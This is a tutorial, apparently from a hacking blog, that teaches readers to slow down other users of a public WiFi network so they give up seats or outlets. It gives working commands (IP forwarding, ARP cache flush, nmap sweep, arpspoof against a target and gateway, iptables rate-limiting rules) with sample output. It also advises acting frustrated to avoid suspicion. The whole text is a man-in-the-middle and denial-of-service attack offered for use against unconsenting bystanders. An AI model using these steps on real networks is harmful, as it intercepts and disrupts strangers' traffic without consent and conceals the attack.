How To Annoy Public WiFi Users
You're connected to a Public WiFi connection and realize how abysmally slow it's become. Is it the kids watching NetFlix? Is it the hipster live streaming his food? Or the pirate bit-torrenting in the corner? It really doesn't matter ... you're about to grind everyone else's connections to a near halt in the hopes they'll pack up and leave. NOTE: This can also be handy to get rid of people hogging all the comfy chairs or power outlets that are parked at your local coffee shop.
Now, a simple ARP spoofing operation can drive all their traffic to you where you can drop it leaving them with no data at all. But then it would be obvious you're the only user with a working connection. An added problem to a complete denial of service is the victims might complain to the host. This would draw attention to the access point working fine leading to the possible conclusion somebody is hacking. A better option would be to intercept everyone's traffic and then simply slow them down so they think the WiFi is working fine but that everyone else is hogging the bandwidth.
Needed Tools (all of this is native to Kali):
- ARP Spoofer like arpspoof from dsniff
- Network Scanner like nmap
- Packet Filter with rate limiting controls like iptables
For any of this to work, your machine must forward received packets it receives so that it becomes a "man in the middle." You must enable IP packet forwarding with this simple command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now identify all the people present on the network to mess with. Now that firewalls are more prevalent these days, a simple port scan may not be enough to identify hosts since your query packets will be ignored. However, flushing the currently cached ARP table, doing a quick scan of the subnet, and then reviewing the freshly populated ARP table will always reveal all the nodes. The following example commands demonstrate flushing and scanning a common
192.168.1.* private subnet.
Flush the ARP cache using the
root@EVILBOX:~# ip -s neighbor flush all *** Round 1, deleting 16 entries *** *** Flush is complete after 1 round ***
Conduct a quick scan of all the devices on the subnet to force populate the ARP table:
root@EVILBOX:~# nmap -sL 192.168.1.* Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-15 21:40 EDT Nmap scan report for 192.168.1.0 Nmap scan report for 192.168.1.1 Nmap scan report for 192.168.1.2 .... Nmap scan report for 192.168.1.253 Nmap scan report for 192.168.1.254 Nmap scan report for 192.168.1.255
View the freshly populated ARP cache:
root@EVILBOX:~# arp -a ? (192.168.1.5) at dc:85:de:f6:a8:47 on [ether] on wlan0 ? (192.168.1.4) at c8:69:cd:98:17:68 on [ether] on wlan0 _gateway (192.168.1.1) at 1c:1b:d:56:fc:f1 on [ether] on wlan0
At this point, you can begin picking victims out of the ARP cache results and start ARP spoofing in order to make all the traffic from the public WiFi spot's users get directed through your machine. The following command instructs
arpspoof to forward bi-directional traffic between a target and a router.
root@EVILBOX:~# arpspoof -t 192.168.1.4 -r 192.168.1.1
Now all of the traffic from
192.168.1.4 to and from the router are getting forwarded through your machine. After flushing the
FORWARD chain, set two quick
iptables rules in order to slow down the target's perceived connection. You can tweak the allowed packets per second setting to identify a threshold where the target thinks the connection is working but is just abysmally slow. These rules will not impact your connection at all as the
FORWARD table is only associated to packet forwarding and your connection utilizes the
root@EVILBOX:~# iptables -F FORWARD root@EVILBOX:~# iptables -A FORWARD --match-limit \ --limit 1/sec --limit-burst 1 -j ACCEPT root@EVILBOX:~# iptables -A FORWARD -j REJECT
Repeat the ARP spoofing steps for each targeted IP address. The iptables rules can be refined further with specific source and destination addresses to really tweak who gets throttled the most. You should be able to use manufacturer codes and visual product identification to isolate different users. Don't forget to look around frustrated so everyone else thinks your connection is lagging as well.